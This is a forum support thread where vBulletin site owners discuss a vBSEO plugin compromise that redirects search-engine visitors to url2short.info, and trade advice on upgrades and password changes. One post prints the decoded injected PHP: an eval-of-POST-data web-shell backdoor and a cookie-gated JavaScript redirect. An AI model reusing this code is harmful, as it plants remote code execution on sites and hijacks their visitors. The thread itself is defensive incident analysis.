Security issue

Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0

What should i be doing ? as this re-directing is really hurting my site ?

Should I un-install vbseo and re-install ? or just upgrade to the new version ?

Woc

Originally Posted by usearchme

Ok so ive been hit too, running vbulletin 3.8.1 and vb seo 3.3.0

What should i be doing ? as this re-directing is really hurting my site ?

Should I un-install vbseo and re-install ? or just upgrade to the new version ?

Woc

Your vBSEO needs upgrading to 3.3.2 for sure. Follow the upgrade directions in the vBSEO ZIP file. Older versions of vBSEO are being actively exploited en-masse.

Are you running vBSEO sitemap generator? What version?

We have a number of forums hit by the base64 exploit already.

Here's what we have:
All are running current patched versions of vBSEO (3.2 or 3.3.2).
All are running vBSEO Sitemap Generator 1.7 - 2.2. (none current)
A variety of different vB versions vB 3.6.12 through to 3.7.6.

I have an exported product-crawlability_vbseo.xml file that shows the base64 exploit if you need to see it. Let me know and I'll submit a ticket.

Originally Posted by eksodos

Your vBSEO needs upgrading to 3.3.2 for sure. Follow the upgrade directions in the vBSEO ZIP file. Older versions of vBSEO are being actively exploited en-masse.

Are you running vBSEO sitemap generator? What version?

No im not running vbseo sitemap generator, should i upgrade to the latest version of vbseo as my licence runs that far ?

Hello,

if you have server logs for the time period when that has happened, please provide details via support ticket.

It's happened to us using vbSEO 3.3.2 and Site Generator 2.5. Our exploit is pointing us to url2short.info.
Disabling and re-enabling vbseo seems to have worked for now.

For anyone interested, this is the full code it outputs (deflated, decoded, depacked, unobfuscated etc)

Code:

$key = md5('9h7r');

if (isset($_POST[$key])) {
    eval(base64_decode(str_rot13($_POST[$key])));
}

ini_set('display_errors', 0);
ini_set('log_errors', 0);

$referer = (!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER'));

if (strlen($referer) > 10) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $hostname = @gethostbyaddr($ip);
    if ((strpos($ip, '65.55.') !== 0) && (strpos($hostname, 'msnbot') === false)) {
        $search_engines = array('search.live.com', 'www.google', 'search.yahoo.com', 'www.bing.com', 'yandex.ru', 'baidu.com');
        foreach ($search_engines as $engine) {
            if ((strpos($referer, $engine) !== false) && (empty($_COOKIE['vbsp']))) {
                $host = substr(@md5($_SERVER['HTTP_HOST']), 0, 8);
                die("<html>
                <head>
                </head>
                <body>
                <script type=\"text/javascript\">
                var vbsp = '$host';
                function ipbcc(name, value) {
                    var date = new Date();
                    date['setTime'](date['getTime']() + 86400000);
                    var expires = '; expires=' + date['toGMTString']();
                    document['cookie'] = name + '=' + value + expires + '; path=/'
                };
                ipbcc('vbsp', '1');
                document['location'] = 'http://url2short.info/' + vbsp;
                </script>
                </body>
                </html>");
            }
        }
    }
}

Essentially allowing them to execute misc code, and redirecting new members to their website :(

- Twelve-60

Originally Posted by osodani

It's happened to us using vbSEO 3.3.2 and Site Generator 2.5. Our exploit is pointing us to url2short.info.
Disabling and re-enabling vbseo seems to have worked for now.

Are you using any other published vBulletin add-ons or plugins? If so, can you name them?

Our only other plugin is Inferno vBShout Lite 2.5. We're not up to the latest vb patch level however, so we're installing that now.

Does any effected person use same username + password combinations on different forums ?

Originally Posted by Mert Gökçeimam

Does any effected person use same username + password combinations on different forums ?

Nope, not here. I should note that we are running vB 3.8.4 PL2 which is the latest version in the 3.x series. We are not yet able to upgrade to 4.x.

Originally Posted by gcc llc

Nope, not here. I should note that we are running vB 3.8.4 PL2 which is the latest version in the 3.x series. We are not yet able to upgrade to 4.x.

Even , no i advise everyone who is effected with this malicious attack to update every possible login information to their ftp , ssh , admincp etc. and especially your Administrator passwords.

Originally Posted by Mert Gökçeimam

Even , no i advise everyone who is effected with this malicious attack to update every possible login information to their ftp , ssh , admincp etc. and especially your Administrator passwords.

Have done that, yet the exploit still keeps happening. However, still has not happened again since I upgraded the Sitemap Generator to 2.5. Keeping my fingers crossed.

Just to double check, check youru usergroups, specifically your admins/mods. Make sure there's no one listed who you don't know.

Originally Posted by gcc llc

Have done that, yet the exploit still keeps happening. However, still has not happened again since I upgraded the Sitemap Generator to 2.5. Keeping my fingers crossed.

Did your board get effected from centiyo exploit earlier ?

Sorry we are asking too much questions but we are trying to identify what can be the cause for this exploit and since we can't find any logs we are currently hunting fish in dark waters.